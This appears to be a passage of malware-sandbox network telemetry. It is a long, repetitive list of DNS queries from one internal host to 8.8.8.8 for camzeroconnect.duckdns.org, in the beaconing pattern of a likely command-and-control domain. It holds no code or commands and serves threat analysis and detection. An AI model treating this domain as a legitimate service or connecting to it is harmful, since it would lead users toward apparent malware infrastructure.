                                                                                            Sep 27, 2024 14:01:41.226677895 CEST192.168.2.228.8.8.80x1e58Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:42.246937990 CEST192.168.2.228.8.8.80x27cdStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:42.254384041 CEST192.168.2.228.8.8.80x27cdStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:42.261765003 CEST192.168.2.228.8.8.80x27cdStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:42.268865108 CEST192.168.2.228.8.8.80x27cdStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:42.279783964 CEST192.168.2.228.8.8.80x27cdStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:43.307391882 CEST192.168.2.228.8.8.80xe2d7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:43.317064047 CEST192.168.2.228.8.8.80xe2d7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:43.325021029 CEST192.168.2.228.8.8.80xe2d7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:45.326891899 CEST192.168.2.228.8.8.80xe2d7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:45.334369898 CEST192.168.2.228.8.8.80xe2d7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:46.347330093 CEST192.168.2.228.8.8.80x82Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:46.356028080 CEST192.168.2.228.8.8.80x82Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:46.364794016 CEST192.168.2.228.8.8.80x82Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:46.373334885 CEST192.168.2.228.8.8.80x82Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:46.381865978 CEST192.168.2.228.8.8.80x82Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:50.503493071 CEST192.168.2.228.8.8.80x1206Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:50.510829926 CEST192.168.2.228.8.8.80x1206Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:50.518029928 CEST192.168.2.228.8.8.80x1206Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:50.547816038 CEST192.168.2.228.8.8.80x1206Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:50.557993889 CEST192.168.2.228.8.8.80x1206Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:51.587002993 CEST192.168.2.228.8.8.80x8defStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:51.595680952 CEST192.168.2.228.8.8.80x8defStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:51.603790045 CEST192.168.2.228.8.8.80x8defStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:51.612366915 CEST192.168.2.228.8.8.80x8defStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:51.620038033 CEST192.168.2.228.8.8.80x8defStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:56.678056002 CEST192.168.2.228.8.8.80x6856Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:56.685261965 CEST192.168.2.228.8.8.80x6856Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:56.692328930 CEST192.168.2.228.8.8.80x6856Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:56.699428082 CEST192.168.2.228.8.8.80x6856Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:56.705895901 CEST192.168.2.228.8.8.80x6856Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:57.725100994 CEST192.168.2.228.8.8.80xf155Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:57.732467890 CEST192.168.2.228.8.8.80xf155Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:57.739761114 CEST192.168.2.228.8.8.80xf155Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:57.747539043 CEST192.168.2.228.8.8.80xf155Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:57.754782915 CEST192.168.2.228.8.8.80xf155Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:58.787954092 CEST192.168.2.228.8.8.80x4747Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:58.797257900 CEST192.168.2.228.8.8.80x4747Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:59.803766966 CEST192.168.2.228.8.8.80x4747Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:59.811193943 CEST192.168.2.228.8.8.80x4747Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:59.818821907 CEST192.168.2.228.8.8.80x4747Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:00.844207048 CEST192.168.2.228.8.8.80xc59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:01.847588062 CEST192.168.2.228.8.8.80xc59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:01.855077982 CEST192.168.2.228.8.8.80xc59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:01.862596989 CEST192.168.2.228.8.8.80xc59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:01.986361027 CEST192.168.2.228.8.8.80xc59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:03.007808924 CEST192.168.2.228.8.8.80xb9f9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:03.015917063 CEST192.168.2.228.8.8.80xb9f9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:03.032572031 CEST192.168.2.228.8.8.80xb9f9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:03.058532953 CEST192.168.2.228.8.8.80xb9f9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:03.069828033 CEST192.168.2.228.8.8.80xb9f9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:04.103888988 CEST192.168.2.228.8.8.80x4685Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:04.264270067 CEST192.168.2.228.8.8.80x4685Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:04.272372007 CEST192.168.2.228.8.8.80x4685Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:04.278930902 CEST192.168.2.228.8.8.80x4685Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:04.285540104 CEST192.168.2.228.8.8.80x4685Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:05.304923058 CEST192.168.2.228.8.8.80x2e0bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:05.312443972 CEST192.168.2.228.8.8.80x2e0bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:05.319197893 CEST192.168.2.228.8.8.80x2e0bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:05.326653957 CEST192.168.2.228.8.8.80x2e0bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:05.335335970 CEST192.168.2.228.8.8.80x2e0bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:06.360479116 CEST192.168.2.228.8.8.80xf17cStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:07.080735922 CEST192.168.2.228.8.8.80xf17cStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:07.090181112 CEST192.168.2.228.8.8.80xf17cStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:07.100748062 CEST192.168.2.228.8.8.80xf17cStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:07.111489058 CEST192.168.2.228.8.8.80xf17cStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:08.144737959 CEST192.168.2.228.8.8.80x7cb7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:09.148519039 CEST192.168.2.228.8.8.80x7cb7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:09.156084061 CEST192.168.2.228.8.8.80x7cb7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:09.163108110 CEST192.168.2.228.8.8.80x7cb7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:10.271097898 CEST192.168.2.228.8.8.80x7cb7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:11.309632063 CEST192.168.2.228.8.8.80xab60Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:12.315011024 CEST192.168.2.228.8.8.80xab60Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:12.418077946 CEST192.168.2.228.8.8.80xab60Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:12.425460100 CEST192.168.2.228.8.8.80xab60Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:12.433193922 CEST192.168.2.228.8.8.80xab60Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:13.460370064 CEST192.168.2.228.8.8.80x4f59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:13.467952967 CEST192.168.2.228.8.8.80x4f59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:13.475203991 CEST192.168.2.228.8.8.80x4f59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:13.481988907 CEST192.168.2.228.8.8.80x4f59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:13.489409924 CEST192.168.2.228.8.8.80x4f59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:14.512722969 CEST192.168.2.228.8.8.80xe0f5Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:14.520304918 CEST192.168.2.228.8.8.80xe0f5Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:14.527966976 CEST192.168.2.228.8.8.80xe0f5Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:14.541131973 CEST192.168.2.228.8.8.80xe0f5Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:01.910816908 CEST192.168.2.228.8.8.80xbc93Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:01.917651892 CEST192.168.2.228.8.8.80xbc93Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:01.924629927 CEST192.168.2.228.8.8.80xbc93Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:01.931567907 CEST192.168.2.228.8.8.80xbc93Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:03.083863974 CEST192.168.2.228.8.8.80x2de3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:03.092003107 CEST192.168.2.228.8.8.80x2de3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:03.101176023 CEST192.168.2.228.8.8.80x2de3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:03.115180016 CEST192.168.2.228.8.8.80x2de3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:03.129276037 CEST192.168.2.228.8.8.80x2de3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:04.158838034 CEST192.168.2.228.8.8.80x1a88Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:04.165730000 CEST192.168.2.228.8.8.80x1a88Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:04.173168898 CEST192.168.2.228.8.8.80x1a88Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:04.180490017 CEST192.168.2.228.8.8.80x1a88Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:04.187815905 CEST192.168.2.228.8.8.80x1a88Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:05.208309889 CEST192.168.2.228.8.8.80x4b51Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:06.213185072 CEST192.168.2.228.8.8.80x4b51Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:06.220741034 CEST192.168.2.228.8.8.80x4b51Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:06.227938890 CEST192.168.2.228.8.8.80x4b51Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:10.217060089 CEST192.168.2.228.8.8.80x4b51Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:11.251039982 CEST192.168.2.228.8.8.80xc973Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:11.258600950 CEST192.168.2.228.8.8.80xc973Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:11.268968105 CEST192.168.2.228.8.8.80xc973Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:13.280126095 CEST192.168.2.228.8.8.80xc973Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:13.293257952 CEST192.168.2.228.8.8.80xc973Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:14.346698999 CEST192.168.2.228.8.8.80x2a54Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:14.354322910 CEST192.168.2.228.8.8.80x2a54Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:14.362245083 CEST192.168.2.228.8.8.80x2a54Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:15.465377092 CEST192.168.2.228.8.8.80x2a54Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:15.477320910 CEST192.168.2.228.8.8.80x2a54Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:20.513539076 CEST192.168.2.228.8.8.80x5bfbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:20.727327108 CEST192.168.2.228.8.8.80x5bfbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:21.735188961 CEST192.168.2.228.8.8.80x5bfbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:21.744133949 CEST192.168.2.228.8.8.80x5bfbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:21.750930071 CEST192.168.2.228.8.8.80x5bfbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:22.780183077 CEST192.168.2.228.8.8.80x134eStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:22.788068056 CEST192.168.2.228.8.8.80x134eStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:22.802196980 CEST192.168.2.228.8.8.80x134eStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:22.811011076 CEST192.168.2.228.8.8.80x134eStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:26.805227995 CEST192.168.2.228.8.8.80x134eStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:27.858911991 CEST192.168.2.228.8.8.80xd342Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:27.868410110 CEST192.168.2.228.8.8.80xd342Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:27.877238035 CEST192.168.2.228.8.8.80xd342Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:29.878451109 CEST192.168.2.228.8.8.80xd342Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:29.885818005 CEST192.168.2.228.8.8.80xd342Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:30.901026964 CEST192.168.2.228.8.8.80x5a59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:30.908582926 CEST192.168.2.228.8.8.80x5a59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:30.915776968 CEST192.168.2.228.8.8.80x5a59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:30.922401905 CEST192.168.2.228.8.8.80x5a59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:30.929476976 CEST192.168.2.228.8.8.80x5a59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:31.943100929 CEST192.168.2.228.8.8.80xb830Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:31.950442076 CEST192.168.2.228.8.8.80xb830Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:31.957448959 CEST192.168.2.228.8.8.80xb830Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:31.964853048 CEST192.168.2.228.8.8.80xb830Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:31.971231937 CEST192.168.2.228.8.8.80xb830Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:32.988152027 CEST192.168.2.228.8.8.80x5aafStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:32.999370098 CEST192.168.2.228.8.8.80x5aafStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:33.013245106 CEST192.168.2.228.8.8.80x5aafStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:33.028222084 CEST192.168.2.228.8.8.80x5aafStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:33.063311100 CEST192.168.2.228.8.8.80x5aafStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:34.098870039 CEST192.168.2.228.8.8.80xf944Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:34.105849981 CEST192.168.2.228.8.8.80xf944Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:34.112404108 CEST192.168.2.228.8.8.80xf944Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:36.118577003 CEST192.168.2.228.8.8.80xf944Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:36.135509014 CEST192.168.2.228.8.8.80xf944Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:37.162839890 CEST192.168.2.228.8.8.80x9ecfStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:37.171395063 CEST192.168.2.228.8.8.80x9ecfStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:37.183876991 CEST192.168.2.228.8.8.80x9ecfStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:37.203316927 CEST192.168.2.228.8.8.80x9ecfStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:37.215513945 CEST192.168.2.228.8.8.80x9ecfStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:40.369716883 CEST192.168.2.228.8.8.80xf2ffStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:40.483668089 CEST192.168.2.228.8.8.80xf2ffStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:41.484903097 CEST192.168.2.228.8.8.80xf2ffStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:41.595396996 CEST192.168.2.228.8.8.80xf2ffStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:41.616406918 CEST192.168.2.228.8.8.80xf2ffStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:42.663310051 CEST192.168.2.228.8.8.80x5f1dStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:42.672385931 CEST192.168.2.228.8.8.80x5f1dStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:42.681231022 CEST192.168.2.228.8.8.80x5f1dStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:42.689261913 CEST192.168.2.228.8.8.80x5f1dStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:42.701257944 CEST192.168.2.228.8.8.80x5f1dStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:43.722898960 CEST192.168.2.228.8.8.80x5399Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:43.730235100 CEST192.168.2.228.8.8.80x5399Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:43.737288952 CEST192.168.2.228.8.8.80x5399Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:43.744151115 CEST192.168.2.228.8.8.80x5399Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:43.752209902 CEST192.168.2.228.8.8.80x5399Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:44.765592098 CEST192.168.2.228.8.8.80x1137Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:44.773000002 CEST192.168.2.228.8.8.80x1137Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:44.780136108 CEST192.168.2.228.8.8.80x1137Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:45.023869038 CEST192.168.2.228.8.8.80x1137Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:45.031570911 CEST192.168.2.228.8.8.80x1137Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:50.057538033 CEST192.168.2.228.8.8.80x4da7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:51.063288927 CEST192.168.2.228.8.8.80x4da7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:52.077292919 CEST192.168.2.228.8.8.80x4da7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:53.160895109 CEST192.168.2.228.8.8.80x4da7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:55.311191082 CEST192.168.2.228.8.8.80x4da7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
